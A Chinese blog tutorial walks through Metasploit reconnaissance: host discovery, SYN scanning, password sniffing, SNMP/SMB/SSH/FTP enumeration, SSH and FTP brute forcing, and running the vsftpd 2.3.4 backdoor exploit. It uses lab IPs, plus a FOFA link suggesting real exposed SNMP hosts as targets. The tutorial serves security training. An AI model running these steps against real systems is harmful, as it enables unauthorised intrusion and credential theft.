Metasploit(2) 渗透测试之信息收集

最新推荐文章于 2024-04-23 17:21:37 发布
最新推荐文章于 2024-04-23 17:21:37 发布
阅读量644 收藏 3
点赞数
分类专栏: 网络安全工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41182861/article/details/107218096
版权

基于 TCP 协议收集主机信息

  • 使用 Metasploit 中的 nmap 和arp_sweep收集主机信息

    • 在msf中使用nmap跟nmap的单独使用方法一样,只是nmap成了db_nmap。
      即:msf5 > db_nmap -sV 192.168.1.1

  • arp_sweep:用于通过ARP发现本地存活主机。注意:当使用本模块时出现以下情况时:
    在这里插入图片描述
    这是metasploit的权限不够,所以在启动metasploit时需要用root身份启动。

msf5 > use auxiliary/scanner/discovery/arp_sweep	#调用arp_sweep模块
msf5 auxiliary(scanner/discovery/arp_sweep) > info		#查看这个模块信息
msf5 auxiliary(scanner/discovery/arp_sweep) > options	#查看模块选项
msf5 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 20.0.0.1/24	#设置当前本地网段
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20	#设置线程为20
msf5 auxiliary(scanner/discovery/arp_sweep) > run	#运行
  • 半连接扫描
    原理:向目标主机扫描端口发送SYN数据包。如果能够收到SYN+ACK数据包,则代表此端口开放。如收到RST数据包,则证明此端口关闭。如未收到任何数据包,且确定该主机存在,则证明该端口被防火墙等安全设备过滤。由于SYN扫描并不会完成TCP连接的三次握手过程,所以SYN扫描又叫做半开放扫描。
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set RHOSTS 192.168.1.1 	#设置扫描的目标 
msf5 auxiliary(scanner/portscan/syn) > set PORTS 80		#设置端口范围使用逗号隔开 
msf5 auxiliary(scanner/portscan/syn) > set THREADS 20 	#设置线程数
msf5 auxiliary(scanner/portscan/syn) > run

msf5 auxiliary(sniffer/psnuffle) > jobs		#查看msf后台运行进程
msf5 auxiliary(sniffer/psnuffle) > jobs -K		#杀死进程
  • 使用 auxiliary /sniffer 下的 psnuffle 模块进行密码嗅探
    这个 psnuffle 模块可以像以前 的 dsniff 命令一样。在同网段下,去嗅探密码,支持 pop3、imap、ftp、HTTP GET 协议。
监听:
msf5 > search psnuffle 
msf5 > use auxiliary/sniffer/psnuffle 查看 psnuffle 的模块作用: 
msf5 > auxiliary(sniffer/psnuffle) > info
msf5 > auxiliary(sniffer/psnuffle) > show options 
msf5 > auxiliary(sniffer/psnuffle) > run

此时在同网段在做ftp登录等操作,可嗅探到账号和密码。

基于 SNMP 协议收集主机信息

msf5 > use auxiliary/scanner/snmp/snmp_enum 
msf5 > auxiliary(scanner/snmp/snmp_enum) > show options 
msf5 > auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.18		#目标主机可以试试https://fofa.so/result?qbase64=cG9ydD0iMTYxIg%3D%3D 
msf5 > auxiliary(scanner/snmp/snmp_enum) > run

在这里插入图片描述

可见,通过 snmp 协议探测到的信息非常多。如服务器硬件信息和服务器当前运行的进程,这 两方面是其他扫描方式,获取不到的。

基于 SMB 协议收集信息

  • SMB,信息服务块(Server Messages Block,缩写:SMB),又称网络文件共享系统(CIFS)。是一种在局域网上共享文件和打印机的一种通信协议,它为局域网的不同计算机之间提供文件及打印机等资源的共享服务。

  • 经过Unix服务器厂商重新开发后,可用于连接Unix服务器和Windows客户端。执行打印、文件共享等任务。

  • 使用 smb_version 基于 SMB 协议扫描版本号

msf5 > use auxiliary/scanner/smb/smb_version 
msf5 > auxiliary(scanner/smb/smb_version) > show options  
msf5 > auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.3, 192.168.1.12 
msf5 > auxiliary(scanner/smb/smb_version) > run

注: 192.168.1.3 后面的逗号和 192.168.1.12 之间是有空格的

  • 使用 smb_enumshares 扫描基于 SMB 协议共享的文件(账号、密码)
msf5 > > use auxiliary/scanner/smb/smb_enumshares 
msf5 > auxiliary(scanner/smb/smb_enumshares) > show options 
msf5 > auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 192.168.1.56 
msf5 > auxiliary(scanner/smb/smb_enumshares) > set SMBUser administrator 
msf5 > auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456 
msf5 > auxiliary(scanner/smb/smb_enumshares) > run
  • 使用 smb_lookupsid 扫描系统用户信息(SID 枚举)
msf5 > use auxiliary/scanner/smb/smb_lookupsid 
msf5 > auxiliary(scanner/smb/smb_lookupsid) > show options 
msf5 > auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.1.56 
msf5 > auxiliary(scanner/smb/smb_lookupsid) > set SMBUser administrator 
msf5 > auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456 
msf5 > auxiliary(scanner/smb/smb_lookupsid) > run

基于 SSH 协议收集信息

  • 查看 ssh 服务的版本信息
msf5 > use auxiliary/scanner/ssh/ssh_version 
msf5 > auxiliary(scanner/ssh/ssh_version) > show options 
msf5 > auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.180 
msf5 > auxiliary(scanner/ssh/ssh_version) > run
  • 对 SSH 暴力破解
msf5 > use auxiliary/scanner/ssh/ssh_login 
msf5 auxiliary(scanner/ssh/ssh_login) > show options 
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.12 	#设置字典文件默认的字典文件是不满足实际需求的后期我们使用更强大的字典文件。
msf5 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt 
msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true	#显示爆破过程
msf5 auxiliary(scanner/ssh/ssh_login) > run

基于 FTP 协议收集信息

  • 查看 ftp 服务的版本信息
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > show options
msf5 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.83.139
msf5 auxiliary(scanner/ftp/ftp_version) > run
  • 经扫描,ftp的版本号为:vsFTPd 2.3.4,该版本有后门植入漏洞。利用一下:
msf5 > search 2.3.4
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > options
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.83.139
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

在这里插入图片描述

  • FTP暴力破解
msf5 > use auxiliary/scanner/ftp/ftp_login 
msf5 auxiliary(scanner/ftp/ftp_login) > options
msf5 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf5 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.83.139
msf5 auxiliary(scanner/ftp/ftp_login) > run

在这里插入图片描述

info-sec
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploitable2在VMware上的安装与初步渗透学习
m0_62623551的博客
10-08 2366
Metasploitable2是一个故意易受攻击的Linux虚拟机。该虚拟机可用于进行安全培训、测试安全工具和实践常见的渗透测试技术。
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端... 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
Metasploitable2安装基础----搭建DVWA
weixin_55205599的博客
06-07 1654
最近发现Metasploitable2是靶机,可以直接用DVWA,不用自己用phpstudy搭建环境了(都怪我之前不知道这个靶机,本地搭建DVWA老不成功,其实是包下载的问题)注意:下载下来是zip,解压后用VMware打开;下载下来是VMware的,直接用VMWare打开Metasploitable.vmx文件即可。Metasploitable系统的默认账号密码:msfadmin;命令:sudo passwd root。注:0/24是固定的 24什么含义?密码:password。命令:su root。
渗透测试——信息收集(超详细)
最新发布
qq_62291388的博客
04-23 1564
该篇详细记录了渗透测试的前期——信息收集讲解
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1310
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
Metasploit中主机发现模块arp_sweep
Culprit的博客
02-28 6372
Metasploit 中提供了一些辅助模块可用于活跃主机的发现,这些模块位于Metasploit 源码路径的modules/auxiliary/scanner/discovery/ 目录中,主要有以下几个:arp_sweep、ipv6_multicast_ping、ipv6_neighbor、ipv6_neighbor_router_advetisement、 udp_probe、udp_swee...
Kali与MSF之信息收集
sGanYu
10-31 5420
攻击机:linux kali 靶机:win10、win7和metasploittable2 kali内通过DNS或IP地址收集目标信息 1、Whois 用来查询域名注册信息数据库的工具,一般的域名注册信息会包含域名所有者、服务商、注册日期等等,这些信息在做渗透攻击之前是很有价值的 注:进行whois查询时不能带有www、ftp等前缀,机构在注册域名时通常会注册一个上层域名,其子域名由自身的域名服务器管理,在whois数据库查询失败 2、Nslookup(查询指定域名对应的ip地址) n
Metasploit 渗透测试.pdf
07-23
Metasploit 渗透测试渗透测试实验环境,情报搜集技术,渗透攻击案例
Metasploit渗透测试指南.pdf
12-10
Metasploit渗透测试指南》共有17章,覆盖了渗透测试的情报搜集、威胁建模、漏洞分析、渗透攻击和后渗透攻击各个环节,并包含了免杀技术、客户端渗透攻击、社会工程学、自动化渗透测试、无线网络攻击等高级技术专题...
Metasploitable2靶机漏洞渗透测试
末班车的博客
03-11 1776
Metasploitable2靶机漏洞发现与渗透测试
Metasploitable2使用指南
张同光 (Tongguang Zhang):Hello everyone !
04-22 1万+
http://www.freebuf.com/articles/system/34571.html Metasploitable 2 Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。版本2已经可以下载,并且比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware,VirtualBox,
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
【内网安全】——内网主机发现
Demo不是emo的博客
11-13 8363
在内网渗透中,为了扩大战果,往往需要寻找更多主机并且对这些主机进行安全检测或帐号密码测试,所以主机发现这个步骤必不可少。那主机发现都有哪些方法呢?
渗透测试信息收集篇(含思维导图)
热门推荐
清泪的博客
08-14 1万+
TXT记录一般指为某个主机名或域名设置的说明,如:2)mail IN TXT "邮件主机, 存放在xxx ,管理人:AAA",Jim IN TXT "contact: abc@mailserver.com"也就是您可以设置 TXT ,以便使别人联系到您。如何检测TXT记录?1、进入命令状态;(开始菜单 - 运行 - CMD[回车]);2、输入命令" nslookup -q=txt 这里填写对应的域名或二级域名",查看返回的结果与设置的是否一致即可。......
渗透测试信息收集
weixin_46316850的博客
12-19 584
用于记录自己在渗透测试信息搜集阶段的所学,内容毕竟多,也比较详细。
渗透测试——信息收集
永不落的梦想
07-19 188
信息收集,域名信息收集、IP与端口信息收集、网站信息收集
MSF小练习——MSF的arp_sweep主机存活扫描
ptxybird的博客
08-13 2845
原理:在TCP/IP网络环境中,一台主机在发送数据帧前需要使用ARP(Address Resolution Protocol,地址解析协议)将目标IP地址转换成MAC地址,这个转换过程是通过发送一个ARP请求来完成的。如IP为A的主机发送一个ARP请求获取IP为B的MAC地址,此时如果IP为B的主机存在,那么它会向A发出一个回应。因此,可以通过发送ARP请求的方式很容易地获取同一子网上的活跃主机情况,这种技术也称为ARP扫描。Metasploit的arp_sweep模块便是一个ARP扫描器。 第一步:在打
metasploit】2 情报信息收集
kkza的博客
06-14 296
就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间,可以用 whois.chinaz.com 访问!
渗透测试信息收集
qq_44484541的博客
05-11 259
网络拓扑图是指目标公司网络的结构图,包括各个设备之间的关系、功能、位置等。在进行渗透测试之前,必须先进行信息收集工作,以了解目标系统的架构、设备、漏洞等信息,为后续攻击做准备。漏洞扫描是指通过对目标系统的操作系统和应用程序版本号等信息进行匹配,找出可能存在的已知漏洞,并且给出相应的修复建议。例如,可以通过LinkedIn等社交媒体网站,了解目标公司的组织结构和相关人员的职位信息等。在确定进行渗透测试的目标之前,需要了解关于目标系统的基本信息,如域名、IP地址、子网掩码等。可以使用nmap等工具。
metasploit渗透jenkins
09-01
- *1* *3* [Metasploit 渗透测试手册第三版 第二章 信息收集与扫描(翻译)](https://blog.csdn.net/weixin_34186950/article/details/91427380)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值